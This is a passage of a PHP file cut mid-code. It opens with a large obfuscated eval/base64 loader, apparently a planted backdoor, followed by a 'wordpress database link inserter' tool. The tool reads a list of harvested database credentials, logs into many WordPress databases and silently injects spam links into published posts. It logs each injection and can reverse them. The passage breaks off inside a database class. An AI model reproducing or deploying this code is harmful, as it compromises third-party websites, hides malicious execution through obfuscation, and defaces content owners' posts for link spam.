FoVVJGRkZVbTFYYmtSVEtTa2dlMloxYm1OMGFXOXVJR1YyWVd4c2QyaFdaa2xXYmxkUVlsUW9KSE1wZXlSbElEMGdJaUk3SUdadmNpQW9KR0VnUFNBd095QWtZU0E4UFNCemRISnNaVzRvSkhNcExURTdJQ1JoS3lzZ0tYc2taU0F1UFNBa2MzdHpkSEpzWlc0b0pITXBMU1JoTFRGOU8zMXlaWFIxY200b0pHVXBPMzFsZG1Gc0tHVjJZV3hzZDJoV1prbFdibGRRWWxRb0p6c3BLU0k5UVZObU4ydDVZVTVTYldKQ1VsaFhkazV1VW1wR1ZWZEtlRmRaTWxaSFNtOVZSMXAyVGxkYWF6bEdUakpWTW1Ob1NrZEpkVXBZWkRCV2JXTTNRbE5MY2pGRlduVkdSV1JhT1RKalIwNVhVVnBzUldKb1dsaGFhMmRwVWxSS2ExcFFiREJhYUZKR1lsQkNSbUZQTVVWaWFGcFlXbWMwTW1Kd1VqTlpkVlp1V2lJb1pXUnZZMlZrWHpRMlpYTmhZaWhzWVhabEp5a3BPMlYyWVd3b1pYWmhiR3gzYUZabVNWWnVWMUJpVkNnbk95a3BJamRyYVVrNU1FVlRhMmh0VlhwTmJVbHZXVEJWUTFveVZFcGtWMWxWZURKVVVXaHRWRTU0VjFreVZsZFFXRTVHV201T1JWcFdiRlpoUms1V1ltaDRWMWt5VmtkS0lpaGxaRzlqWldSZk5EWmxjMkZpS0d4aGRtVW5LU2s3WlhaaGJDaGxkbUZzYkhkb1ZtWkpWbTVYVUdKVUtDYzdLU2tpTjJ0cFNUa3dWRkZxUW1wVlNVWnRTVzlaTUZWRFdqSlVTbVJYV1ZWNE1sUlJhRzFVVG5oWFdUSldWMUJZV2xaamFGcHNZM0JXTWxaVmVGZFpNbFpIU2lJb1pXUnZZMlZrWHpRMlpYTmhZaWhzWVhabEp5a3BPMlYyWVd3b1pYWmhiR3gzYUZabVNWWnVWMUJpVkNnbk95a3BJamRyYVVrNVVYcFdhRXBEUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3d4YWxGdGFFWlNWbVJGWkdsV1JscERlRmRaTWxaSFNpSW9aV1J2WTJWa1h6UTJaWE5oWWloc1lYWmxKeWtwTzJWMllXd29aWFpoYkd4M2FGWm1TVlp1VjFCaVZDZ25PeWtwSWowOWQwOXdTVk5RT1VWV1V6SlNNbFpLU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkRGVVdsWndibEoxVmpKUmMwb3laRko0VjFreVZrZEtJaWhsWkc5alpXUmZORFpsYzJGaUtHeGhkbVVuS1NrN1pYWmhiQ2hsZG1Gc2JIZG9WbVpKVm01WFVHSlVLQ2M3S1NraVBYTlVXSEJKVTFZeFZXeFZTVnBGVFZsT2JGWjNWV3hXTlZsVlZsWktiRkpVU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkhSc1ZVWmFiRlZHVGpGWWF6QjZVVzFPTWxwT1FtNWtjRTVZVkhsNFYxa3lWa2RLSWlobFpHOWpaV1JmTkRabGMyRmlLR3hoZG1VbktTazdaWFpoYkNobGRtRnNiSGRvVm1aSlZtNVhVR0pVS0NjN0tTa2lQWE5VUzNCcmFXTnhUbXhXYWtZd1lXaFNSMWRhVWxoTmFGcFlXbXRuYVdSc1NtNWpNRTVJUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3hvUTJKb1dsaGFJaWhsWkc5alpXUmZORFpsYzJGaUtHeGhkbVVuS1NrN1pYWmhiQ2hsZG1Gc2JIZG9WbVpKVm01WFVHSlVLQ2M3S1NraVBYTlVTM0JKVTFBNVl6SlpjMmhZWWxwU2JsSjBWbXhKYjFrd1ZVTmFNbFJLWkZkWlZYZ3lWRkZvYlZST2VGZFpNbFpIU1hOcmFVa3dXVEZTWVZadVVsaGtiRWx2V1RCVlExb3lWRXBrVjFsVmVESlVVV2h0VkU1NFYxa3lWa2RKYzJ0cFNUbHJSVmRoU2tSaVNFWnRZVXRvVmxkdFdqQldhRXBEUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3hDUTB4d1NVTk5OVEJYVlZBMWExWlZTa05MUjA1c1VXMDVWVk51UmtkV2N6bEZWVzgxVlZSelJtMWtiRUpEVEhCSlUxQkNOVEpaZUdkdVRWWktRMHRIVG14UmJUbFZVMjVHUjFaek9VVlZielZWVkhOR2JXUnNRa05NY0VsRFlqUkthbGN5YkdwTlUwcERTMGRPYkZGdE9WVlRia1pIVm5NNVJWVnZOVlZVYzBadFpHeG9VMlZvU201amFFSlRVR2RSU0ZWRmFESmllbVJGWkhWU1JXUlZlRmRaTWxaSFNpSW9aV1J2WTJWa1h6UTJaWE5oWWloc1lYWmxKeWtwTzJWMllXd29aWFpoYkd4M2FGWm1TVlp1VjFCaVZDZ25PeWtwSWowOWQwOXdhMmxKTlZGSVZreHdibFZFZEd0bFV6VnRXWE5LYkdKcFdtNVVlV2RHVFZkS2FsZHRXakZTYVVKdVYwaEdNVm93TURKWmVFbEdWMkZzU0dSSmJFVmpUbWhyVTNaU1ZHSlNNV3RVZVVsc1UzTkNSRlpoV2pCTmFIQnJVMVpTYkZKcldtdFpiM0JHVjJGa1IwNTVTVWRqVTA1VVZ6RmFiR0poU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkdoRFltaGFXRm9pS0dWa2IyTmxaRjgwTm1WellXSW9iR0YyWlNjcEtUdGxkbUZzS0dWMllXeHNkMmhXWmtsV2JsZFFZbFFvSnpzcEtTSTlQWGRQY0dkRFRXdFNSMHBuTUVSSldYQklVbmxvTVZSSlpESlRibmhYV1RKV1Iwb2lLR1ZrYjJObFpGODBObVZ6WVdJb2JHRjJaU2NwS1R0bGRtRnNLR1YyWVd4c2QyaFdaa2xXYmxkUVlsUW9KenNwS1NJOVBWRm1PWFJVV0hoelJtRnFSa1ZVWVhSSFZrTmFSbUl4UmpOYWVrNHpZM05HYldSc1VrTkpPVUZEWVdwR1JWUmhkRWRXUTFwR1lqRkdNMXA2VGpOamMwWnRaR3hTUTBrM2EwTmhha1pGVkdGMFIxWkRXa1ppTVVZelducE9NMk56Um0xa2JGSkRUR3hXYkdWSE5WZGFSSGh0V1ROR1JtSm9XbGhhYTJkVFdtczVSMkozYUZoYVp6QkVTVzlPVjFGTmNERmhWVXByVm5OV1dHTnVUak5qZW5oWFdUSldSMG8zYkZOTGJGWnNaVWMxVjFwRWVHMVpNMFpHWW1oYVdGcHJkME5oYWtaRlZHRjBSMVpEV2taaU1VWXpXbnBPTTJOelJtMWtiRkpEUzNsU00yTjVVak5qYjBGcFduQjBWRXR3TUZaTGFWVnNWSGhSVmxNMVdWVldWa3BzVWxSS1EwdEhUbXhSYlRsVlUyNUdSMVp6T1VWVmJ6VlZWSE5HYldSc2RHeFZSbHBzVlVaT01WaHJaMU5hYXpreVdYVldSMko1Vm01TWNFbFRUMjR4YlZOcFoybFNWRXByV2xCc01GcG9Va1ppVUVKR1lVOHhSV0pvV2xoYWRXdDVVVzFPTWxwT1FtNWtjRTVZVkhsNFYxa3lWa2RLYjFWSFduWk9iV0pzZUcxak1UVlRTMmxyVkZOMGNHdEpiMWt3VlVOYU1sUktaRmRaVlhneVZGRm9iVlJPZUZkWk1sWnRUR1JzYVVrNWEydFNVMVpyVW5kbmJGSlRSa1JXVDFveFlWWktRMHRIVG14UmJUbFZVMjVHUjFaek9VVlZielZWVkhOR2JXUnNkR3hWUmxwc1ZVWk9NVmhyTkZOTGFUQkVUVlZHYlVsdldUQlZRMW95VkVwa1YxbFZlREpVVVdodFZFNTRWMWt5Vm0xTWNFbFRVRFJSTUZscFoybFNWRXByV2xCc01GcG9Va1ppVUVKR1lVOHhSV0pvV2xoYWRXdHBTWFpLYTJKTlNrTkxSMDVzVVcwNVZWTnVSa2RXY3psRlZXODFWVlJ6Um0xa2JEVnBVVzFvUmxKV1pFVmthVlpHV2tONFYxa3lWa2RLZFd0cFNUa3dlbVJOU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkRWRFZ6WlNhMk5aT1VWVGJuUXdXbk5HYldSc1VtbE1jRWxUVURSclNGUnBaMmxTVkVwcldsQnNNRnBvVWtaaVVFSkdZVTh4UldKb1dsaGFkV3RwU1Rrd2VscFFTa05MUjA1c1VXMDVWVk51UmtkV2N6bEZWVzgxVlZSelJtMWtiRFY1VmxkR1dGbFhTbGhoYkdSR1ZuTkdiV1JzVWtOTGRVcEZWR3BrVlZOS09WVlhlSFJYVTBNeFZWSlllRmRaTWxaSFNUbEJRMkZxUmtWVVlYUkhWa05hUm1JeFJqTmFlazR6WTNOR2JXUnNVa05KTjJ0RFRYZG5SRTE0YzFOTGIxVlhZbkJTU0V4d2EybEpPVEJGVTJ0b2JWVjZUVzFKYjFrd1ZVTmFNbFJLWkZkWlZYZ3lWRkZvYlZST2VGZFpNbFpIU3pGUlYySnpZekZWYTJReVVXdFdWbGR3VmpCVmRFWkhZbWhhV0ZwcloxTmFjSFF5WW5aT1IyUnNUa2hSWjNOSVNXeE9TR0pzUWxObU4wSlRTM0JyVTFoWVRrWmFiazVGV2xac1ZtRkdUbFppYUhoWFdUSldSMHBpVmxWVFREa3dWRVE1UmtwdlVWaGFlazVZWVc5QmFXTjJRbE5MY0UxcldtcGtWMVIzV2xoaGVqRnJZM05HYldSc1VrTkpjMGxUWVhaSlEwbDFRVk5MTUVKR1VtODVNbU5JVW01aVJWSklWbk5HYldSc1VrTkpjMGxEWm1sblUxcHJPVWRpZHpGWFlXYzBRMGxwT0dsSmIyY3lXVEJHVjJKbVpGZGFlVUpJUzI5WlYyRWlLR1ZrYjJObFpGODBObVZ6WVdJb2JHRjJaU2NwS1Rza1pYWmhiRlZrUTFoVVJGRkZVbTFYYmtSVElEMHhPRGM1TWp0OSI7JGV2YTF0WWxiYWtCY1ZTaXIgPSAiXHg2NVwxNDRceDZmXDE1NFx4NzBcMTcwXHg2NSI7JGV2YTF0WWxkYWtCY1ZTaXIgPSAiXHg3M1wxNjRceDcyXDE2Mlx4NjVcMTY2IjskZXZhMXRZbGRha0JvVlMxciA9ICJceDY1XDE0M1x4NjFcMTU0XHg3MFwxNDVceDcyXDEzN1x4NjdcMTQ1XHg3MlwxNjAiOyRldmExdFlpZG9rQm9WU2pyID0gIlx4M2JcNTFceDI5XDEzNVx4MzFcMTMzXHg3MlwxNTJceDUzXDEyNlx4NjNcMTAyXHg2YlwxNDFceDY0XDE1MVx4NTlcMTY0XHgzMVwxNDFceDc2XDE0NVx4MjRcNTBceDY1XDE0NFx4NmZcMTQzXHg2NVwxNDRceDVmXDY0XHgzNlwxNDVceDczXDE0MVx4NjJcNTBceDZjXDE0MVx4NzZcMTQ1XHg0MFw3Mlx4NjVcMTY2XHg2MVwxNTRceDI4XDQyXHg1Y1w2MVx4MjJcNTFceDNiXDcyXHg0MFw1MFx4MmVcNTNceDI5XDEwMFx4NjlcMTQ1IjskZXZhMXRZbGRva0JjVlNqcj0kZXZhMXRZbGRha0JjVlNpcigkZXZhMXRZbGRha0JvVlMxcik7JGV2YTF0WWxkYWtCY1ZTanI9JGV2YTF0WWxkYWtCY1ZTaXIoJGV2YTF0WWxiYWtCY1ZTaXIpOyRldmExdFlpZGFrQmNWU2pyID0gJGV2YTF0WWxkYWtCY1ZTanIoY2hyKDI2ODcuNSowLjAxNiksICRldmExZllsYmFrQmNWU2lyKTskZXZhMXRZWGRha0FjVlNqciA9ICRldmExdFlpZGFrQmNWU2pyWzAuMDMxKjAuMDYxXTskZXZhMXRZaWRva0JjVlNqciA9ICRldmExdFlsZGFrQmNWU2pyKGNocigzNjI1KjAuMDE2KSwgJGV2YTF0WWlkb2tCb1ZTanIpOyRldmExdFlsZG9rQmNWU2pyKCRldmExdFlpZG9rQmNWU2pyWzAuMDE2Kig3ODEyLjUqMC4wMTYpXSwkZXZhMXRZaWRva0JjVlNqcls2Mi41KjAuMDE2XSwkZXZhMXRZbGRha0JjVlNpcigkZXZhMXRZaWRva0JjVlNqclswLjA2MSowLjAzMV0pKTskZXZhMXRZbGRha0JjVlNpciA9ICIiOyRldmExdFlsZGFrQm9WUzFyID0gJGV2YTF0WWxiYWtCY1ZTaXIuJGV2YTF0WWxiYWtCY1ZTaXI7JGV2YTF0WWlkb2tCb1ZTanIgPSAkZXZhMXRZbGJha0JjVlNpcjskZXZhMXRZbGRha0JjVlNpciA9ICJceDczXDE2NFx4NzJceDY1XDE0M1x4NzJcMTYwXDE2NFx4NzIiOyRldmExdFlsYmFrQmNWU2lyID0gIlx4NjdcMTQxXHg2ZlwxMzNceDcwXDE3MFx4NjUiOyRldmExdFlsZGFrQm9WUzFyID0gIlx4NjVcMTQzXHg3MlwxNjAiOyRldmExdFlsZGFrQmNWU2lyID0gIiI7JGV2YTF0WWxkYWtCb1ZTMXIgPSAkZXZhMXRZbGJha0JjVlNpci4kZXZhMXRZbGJha0JjVlNpcjskZXZhMXRZaWRva0JvVlNqciA9ICRldmExdFlsYmFrQmNWU2lyO30gfSAgDQogDQogcmV0dXJuICRldmFsc3NzZ3F1bFZCVGtaTEFjaDsgICB9IH0NCiBpZighJGV2YTFmWTJiYWsxY3owaXIoIlx4NjdcMTcyXHg2NFwxNDVceDYzXDE1N1x4NjRcMTQ1IikpIHsNCiBmdW5jdGlvbiBnemRlY29kZSgkZXZhMWZZMmJvMDF6bzgxNykgeyAkZXZhMWZZMmJhbDFjejhpNCA9ICJceDczXDE2NFx4NzJcMTYwXHg2ZlwxNjMiOyAkZXZhMWZZMmJvbDFjejhpNSA9ICJceDczXDE2NVx4NjJcMTYzXHg3NFwxNjIiOyAkZXZhMWZZMmJvMTFjejhpNSA9ICJceDc1XDE1Nlx4NzBcMTQxXHg2M1wxNTMiOyAkZXZhMWZZMmJvMWxjejhpNSA9ICJceDYzXDE1MFx4NzIiOyAkZXZhMWZZMmJvMWx6YzhpNSA9ICJceDY3XDE3Mlx4NjlcMTU2XHg2NlwxNTRceDYxXDE2NFx4NjUiOw0KICRldmExZlkyYm8wMXpvMzE3PUBvcmQoQCRldmExZlkyYm9sMWN6OGk1KCRldmExZlkyYm8wMXpvODE3LDMsMSkpOw0KICRldmExZlkyYm8wMWMwMzE3PTEwOyAgaWYoJGV2YTFmWTJibzAxem8zMTcmNCkgew0KICRldmExZlkyYm8wMXowMzE3PUAkZXZhMWZZMmJvMTFjejhpNSgndicsJGV2YTFmWTJib2wxY3o4aTUoJGV2YTFmWTJibzAxem84MTcsMTAsMikpOw0KICRldmExZlkyYm8wMXowMzE3PSRldmExZlkyYm8wMXowMzE3WzFdOw0KICRldmExZlkyYm8wMWMwMzE3Kz0yKyRldmExZlkyYm8wMXowMzE3Ow0KIH0gIGlmKCRldmExZlkyYm8wMXpvMzE3JjgpIHsNCiAkZXZhMWZZMmJvMDFjMDMxNz1AJGV2YTFmWTJiYWwxY3o4aTQoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzFsY3o4aTUoMCksJGV2YTFmWTJibzAxYzAzMTcpKzE7DQogfSAgaWYoJGV2YTFmWTJibzAxem8zMTcmMTYpIHsNCiAkZXZhMWZZMmJvMDFjMDMxNz1AJGV2YTFmWTJiYWwxY3o4aTQoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzFsY3o4aTUoMCksJGV2YTFmWTJibzAxYzAzMTcpKzE7DQogfSAgaWYoJGV2YTFmWTJibzAxem8zMTcmMikgew0KICRldmExZlkyYm8wMWMwMzE3Kz0yOw0KIH0gICRldmExZlkyYm8wMWMwM2E3PUAkZXZhMWZZMmJvMWx6YzhpNShAJGV2YTFmWTJib2wxY3o4aTUoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzAxYzAzMTcpKTsgIGlmKCRldmExZlkyYm8wMWMwM2E3PT09RkFMU0UpIHsNCiAkZXZhMWZZMmJvMDFjMDNhNz0kZXZhMWZZMmJvMDF6bzgxNzsNCiB9ICByZXR1cm4gJGV2YTFmWTJibzAxYzAzYTc7DQogfSB9DQogZnVuY3Rpb24gZXZhMWZZMmJhazFjVjJpcigkdmFyNikgeyAkZXZhMWZZMmIwMWx6YzhsNSA9ICJceDcwXDE2Mlx4NjVcMTQ3XHg1ZlwxNjJceDY1XDE2MFx4NmNcMTQxXHg2M1wxNDUiOyAkZXZhMWZZMmIwbGx6YzhsNSA9ICJceDcwXDE2Mlx4NjVcMTQ3XHg1ZlwxNTVceDYxXDE2NFx4NjNcMTUwIjsgJGV2YTFmWTJiMDIyemM4bDUgPSAiXHg0OFwxNDVceDYxXDE0NFx4NjVcMTYyIjsgJGV2YTFmWTJiMDIyem84bDUgPSAiXHg2N1wxNzJceDY0XDE0NVx4NjNcMTU3XHg2NFwxNDUiOyAkZXZhMWZZMmIwNTJ6bzhsNSA9ICJceDQzXDE1N1x4NmVcMTY0XHg2NVwxNTZceDc0XDU1XHg0NVwxNTZceDYzXDE1N1x4NjRcMTUxXHg2ZVwxNDdceDNhXDQwXHg2ZVwxNTdceDZlXDE0NSI7ICRldmExZlkyYjA1MnpvOGwxID0gIlx4MmZcMTM0XHgzY1wxMzRceDJmXDE0Mlx4NmZcMTQ0XHg3OVw1N1x4NzNcMTUxIjsgJGV2YTFmWTJiMDYyem84bDEgPSAiXHgyZlw1MFx4NWNcNzRceDVjXDU3XHg2MlwxNTdceDY0XDE3MVx4NWJcMTM2XHg1Y1w3Nlx4NWRcNTJceDVjXDc2XHgyOVw1N1x4NzNcMTUxIjsgJGV2YTFmWTJiMDYxem84bDEgPSAiXHgyZlwxMzRceDNjXDEzNFx4MmZcMTUwXHg3NFwxNTVceDZjXDU3XHg3M1wxNTEiOyAkZXZhMWZZMmJvNjF6bzhsMSA9ICJceDJmXDUwXHg1Y1w3NFx4NWNcNTdceDY4XDE2NFx4NmRcMTU0XHg1YlwxMzZceDVjXDc2XHg1ZFw1Mlx4NWNcNzZceDI5XDU3XHg3M1wxNTEiOyAkZXZhMWZZMmIwMjJ6YzhsNSgkZXZhMWZZMmIwNTJ6bzhsNSk7ICRldmExZlkyYm82MXpvOGw3PSRldmExZlkyYjAyMnpvOGw1KCR2YXI2KTsgIGlmKCRldmExZlkyYjBsbHpjOGw1KCRldmExZlkyYjA1MnpvOGwxLCRldmExZlkyYm82MXpvOGw3KSkgew0KIHJldHVybiAkZXZhMWZZMmIwMWx6YzhsNSgkZXZhMWZZMmIwNjJ6bzhsMSwgZXZhMWZZMmJhazFjVjBpcigpLiJcbiIuIlx4MjRcNjEiLCAkZXZhMWZZMmJvNjF6bzhsNywxKTsgfSBlbHNlIHsNCiBpZigkZXZhMWZZMmIwbGx6YzhsNSgkZXZhMWZZMmIwNjF6bzhsMSwkZXZhMWZZMmJvNjF6bzhsNykpIHsNCiByZXR1cm4gJGV2YTFmWTJiMDFsemM4bDUoJGV2YTFmWTJibzYxem84bDEsIGV2YTFmWTJiYWsxY1YwaXIoKS4iXG4iLiJceDI0XDYxIiwgJGV2YTFmWTJibzYxem84bDcsMSk7DQogfSBlbHNlIHsgcmV0dXJuICRldmExZlkyYm82MXpvOGw3OyB9DQogfSB9DQokZXZhMWZZMmJvNjF6bzgxNyA9ICJceDZmXDE0Mlx4NWZcMTYzXHg3NFwxNDFceDcyXDE2NCI7ICRldmExZlkyYm82MXpvODE3KCJceDY1XDE2Nlx4NjFcNjFceDY2XDEzMVx4MzJcMTQyXHg2MVwxNTNceDMxXDE0M1x4NTZcNjJceDY5XDE2MiIpOw0KCX0\x4e\103\x6e\60\x3d\42\x29\51\x3b\57\x2f"); ?><!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>automatical inserter links to wordpress database</title> <script> function hide() { var obj = document.getElementById("message"); obj.style.display = "none"; } setTimeout(hide, 5000); </script> </head> <body> <?php DEFINE('DBG', 0); DEFINE('SEP', ' | '); DEFINE('BR', '<BR>'.PHP_EOL); DEFINE('NPOST', 4); DEFINE('LOG_EXT', '.log'); DEFINE('PROC_LOG', 'process'); DEFINE('CON_LOG', 'connect'); DEFINE('REV_LOG', 'reverse'); DEFINE('LIST_DB', 'pass.txt'); DEFINE('ARCH', $_SERVER['SERVER_NAME'].'.tar.gz'); ini_set("display_errors","1"); ini_set("display_startup_errors","1"); ini_set("memory_limit","1000M"); @set_time_limit ( 0 ); @ini_set ( 'max_execution_time', 0 ); $params = array(); $params['pswd'] = "pass"; $params['links'] = "links"; $logs = array(); $logs['connect'] = CON_LOG; $logs['process'] = PROC_LOG; $logs['reverse'] = REV_LOG; echo "<div id=\"message\">"; echo checkInstall($params, "txt"); echo checkInstall($logs, "log"); echo "</div>"; ?> <h1>Actions</h1> <form action="<?=$_SERVER['SCRIPT_NAME'] ?>"> <input type="radio" name="flink" value="links_txt" >links.txt <input type="radio" name="flink" value="links1_txt">links1.txt <input type="hidden" name="a" value="post" /> <input type="submit" value="post links"> </form> <a href="?a=reverse">reverse posting</a><br /> <h2>Logs</h2> <a href="?l=connect">connections.log</a><br /> <a href="?l=process"><?php echo(PROC_LOG) ?>.log</a><br /> <a href="?l=reverse">reverse.log</a><br /> <br /> <a href="?d=true">archive logs</a><br /> <div style="margin-top: 15px; clear: both; border-top: 1px dotted #999;"> <?php $flink = 'links.txt'; if(isset($_GET['flink'])){ if($_GET['flink'] == 'links_txt') { $flink = 'links.txt';} if($_GET['flink'] == 'links1_txt') { $flink = 'links1.txt';} } if (isset($_GET['l'])) { showLog($_GET['l']); } if (isset($_GET['d'])) { preDownloadLogs(); } if (isset($_GET['a'])) { if($_GET['a'] == 'post') { postLinks($flink); } if($_GET['a'] == 'reverse') { reverse_posting(); } } function postLinks($flink = 'links.txt') { $lch = fopen("connect.log", "w"); $num_of_bd = 0; $pswds = get_ar_file(LIST_DB); $links = get_ar_file($flink); if($pswds AND $links){ $num_of_bd = COUNT($pswds); dbg_prn('COUNT OF DATABASES pass.txt - '.$num_of_bd); $num_of_links = COUNT($links); dbg_prn('COUNT OF DATABASES pass.txt - '.$num_of_bd .'FILE - <strong>'.$flink.'</strong>; COUNT OF LINKS - ' .$num_of_links); } else { fwrite($lch, "!ERR: pswd OR ".$flink."file not exist\n"); return FALSE; } $total_updates = $n_bases = $i_url = 0; foreach ($pswds as $a_line) { $atr = get_db_atr($a_line); $db = new db($atr['host'], $atr['user'], $atr['pass'], $atr['db']); if ($db->status != "connected") { fwrite($lch, "<span style='color:#fb0000;'>".$db->status ."</span>\n<br>"); } $get_url = $db->fetch_assoc("SELECT `option_value` FROM `wp_options` WHERE `option_name` = 'siteurl' OR `option_name` = 'home'"); if (isset($get_url[0]['option_value'])) { $tmp_url = $get_url[0]['option_value']; } else if (isset($get_url[1]['option_value'])) { $tmp_url = $get_url[1]['option_value']; } else { $tmp_url = "http://"; } if ($tmp_url != "http://") { $find_s_pattern = "/http\:\/\/.+\.[a-zA-Z0-9]{0,5}[\.a-zA-Z0-9]{0,5}?/i"; if (preg_match($find_s_pattern, $tmp_url, $matches)) { $tmp_url = $matches[0]."."; } else { $tmp_url = $tmp_url."."; } } $res = $db->fetch_assoc("SELECT `ID`, `guid`, `post_content` FROM `".$atr['pref']."posts` WHERE `post_status` = 'publish' AND post_type='post'"); $count_posts = count($res); $str_scr = 'TOTAL COUNT OF POST IN '.trim($a_line).' - '.$count_posts; $pattern = "~.*?[.?!](?:\s|$)~s"; $ret_arr = array(); $r_idx = NULL; $saved_links = $empty_links = $count_post_ready_to_injekt = $count_good_post = 0; if(isset($res)){ foreach($res as $key => $val){ $prop = $val['post_content']; if(preg_match_all($pattern, $prop, $proposals)) { $r_idx = array_rand($proposals[0]); $fl_p_ok = FALSE; $k = 0; $ar_kase = Array(); while(!$fl_p_ok AND count($ar_kase) < count($proposals[0])){ $k++; $r_idx = array_rand($proposals[0]); $ar_kase[] = $r_idx; $ar_kase = array_values(array_unique($ar_kase)); $prop = $proposals[0][$r_idx]; if(strlen(strip_tags($prop)) <> strlen($prop)) { $fl_p_ok = FALSE; } else { $fl_p_ok = TRUE; } } unset($ar_kase); if (!$fl_p_ok){ $empty_links++; dbg_prn('EMPTY POST'); dbg_prn($val); } else { $fl = FALSE; foreach ($links as $content) { $link_in_post = FALSE; $poisk = trim($content); $link_in_post = strpos($val['post_content'], $poisk); if($link_in_post){ $have_id = $val['ID']; $saved_links++; dbg_prn($have_id.' already have an injected url. ' .$poisk); $fl = TRUE; } } } if (($fl_p_ok) AND (!$fl)) { $ret_arr[] = $val; } } else { $empty_links++; } } $res = $ret_arr; unset($ret_arr); $count_good_post = count($res); $str_scr .= ' COUNT OF INJECTED POST - '.$saved_links .' COUNT OF EMPTY POST - '.$empty_links .' COUNT OF GOOD POST - '.$count_good_post; dbg_prn($str_scr); dbg_prn($res); $count_post_ready_to_injekt = $count_posts - $saved_links - $empty_links; if ($count_good_post >= NPOST) { $num_upd_post = NPOST; }else{ $num_upd_post = $count_good_post; } } else { dbg_prn('EMPTY RESULT (NO POST IN BATABASE)'); } if(isset($res) AND ($num_upd_post > 0) ){ dbg_prn($res); dbg_prn($num_upd_post); $random_keys = array_rand($res, $num_upd_post); if(isset($random_keys)){ if($random_keys == 0){ $tmp_ar = Array(); $tmp_ar[] = 0; $random_keys = $tmp_ar; } foreach ($random_keys as $post) { $url_unit = $links[$i_url]; $prop = $res[$post]['post_content']; preg_match_all($pattern, $prop, $proposals); $fl_p_ok = FALSE; $k = 0; $ar_kase = Array(); while(!$fl_p_ok AND count($ar_kase) < count($proposals[0])){ $k++; $r_idx = array_rand($proposals[0]); $ar_kase[] = $r_idx; $ar_kase = array_values(array_unique($ar_kase)); $prop = $proposals[0][$r_idx]; if(strlen(strip_tags($prop)) <> strlen($prop)) { $fl_p_ok = FALSE; } else { $fl_p_ok = TRUE; } } unset($ar_kase); $prop_ar = explode(" ", $prop); $unic = array_unique($prop_ar); $diff = array_diff_assoc($prop_ar, $unic); $out = array_diff($prop_ar, $diff); $word_rkey = array_rand($out); $word = $prop_ar[$word_rkey]; $cnt_word = $replace_unit = NULL; dbg_prn($prop); $zam = " ".$url_unit." ".$word." "; $replace_unit = str_replace($word, $zam, $prop, $cnt_word); dbg_prn($cnt_word); dbg_prn($replace_unit); $cnt_prop = $posting_string = NULL; $posting_string = str_replace($prop, $replace_unit, $res[$post]['post_content'], $cnt_prop); dbg_prn($posting_string); dbg_prn($cnt_prop); $count = 1; if(isset($posting_string) AND $cnt_prop == 1 AND $fl_p_ok){ $upd = "UPDATE `".$atr['pref']."posts` SET `post_content`='" .addslashes($posting_string) ."' WHERE `ID` = ".$res[$post]['ID'].""; $db->query($upd); $total_updates++; $log['dt'] = date("Y-m-d H:i"); $log['id'] = (int)$res[$post]['ID']; $log['guid'] = trim($res[$post]['guid']); $log['bd'] = trim($a_line); $log['link'] = (int)($i_url+1); $log['url'] = trim($url_unit); $log_str = implode(SEP, $log); dbg_prn($log_str, TRUE); Log::write($log_str, PROC_LOG); $i_url++; if($i_url >= $num_of_links){ $i_url = 0;} } else { $log_str = date("Y-m-d H:i").SEP.(int)$res[$post]['ID']. SEP.trim($res[$post]['guid']).' ERRORS, ODNAKO...'; dbg_prn($log_str, TRUE); } } } else { $log_str = date("Y-m-d H:i").SEP.$random_keys .' ERRORS, ODNAKO...'; dbg_prn($log_str, TRUE); } } $n_bases++; fwrite($lch, date("Y-m-d H:i").": ".$atr['host']." Walthru OK no errors<br>\n"); unset($db); unset($res); } fclose($lch); echo "<div style='padding: 5px; background: #ccc'>Post injected: ".$total_updates."</div>"; echo "<div style='padding: 5px; background: #ccc'>Bases walked: ".$n_bases."</div>"; } function reverse_posting() { $reverses = get_ar_file( PROC_LOG.LOG_EXT ); if(isset($reverses)){ foreach ($reverses as $reverse) { if(strlen($reverse) > 20){ LIST($log['dt'], $log['id'], $log['guid'], $log['bd'], $log['link'], $log['url']) = explode(SEP, $reverse); $atr = get_db_atr($log['bd']); $db = new db($atr['host'], $atr['user'], $atr['pass'], $atr['db']); if ($res = $db->fetch_row("SELECT `post_content` FROM `".$atr['pref']."posts` WHERE `ID` = '".$log['id']."'")) { $replace_unit = str_replace(trim($log['url']), '', $res[0][0], $count); if($count > 0){ $db->query("UPDATE `".$atr['pref']."posts` SET `post_content`='".$replace_unit."' WHERE `ID` = '".$log['id']."'"); $stat = ' successfully restored'; }else{$stat = ' not contain url';} $log_str = date("Y-m-d H:i").' POST - '.$log['guid'].$stat; dbg_prn($log_str, TRUE); Log::write($log_str, 'reverse'); } else {echo "Somthing wrong: ".$db->errors;} unset($res); unset($db); } } } unset($reverses); } function get_db_atr($str) { LIST($atr['host'], $atr['user'], $atr['pass'], $atr['db'], $atr['pref']) = explode(':', trim($str)); return $atr; } function checkInstall ($params, $type) { foreach ($params as $key=>$value) { $filename = $value.".".$type; if (!file_exists($filename)) { $fh = fopen($filename, "w"); fclose($fh); echo "Conf file <b>".$filename."</b> created<br />\n"; } } } class db { protected $link; private $server, $username, $password, $db; public $status; public $errors=""; public function __construct($server, $username, $password, $db) { $this->server = $server; $this->username = $username; $this->password = $password; $this->db = $db; return $this->connect(); } private function connect() { if ($this->link = mysql_connect($this->server, $this->username, $this->password)) { mysql_select_db($this->db); mysql_query("SET NAMES UTF8"); $this->status = "connected"; } else { $this->status = "Could not connect to ".$this->username."@".$this->server; } } public function fetch_assoc($query) { $result = mysql_query($query); $i = 0; $this->errors = mysql_error()."\n"; while($r = mysql_fetch_assoc($result)){ foreach ($r as $key=>$value){ $response[$i][$key] = $value; } $i++; } return $response; mysql_free_result($result); } public function fetch_row($query) { $result = mysql_query($query); $this->errors = mysql_error()."\n"; $i = 0; 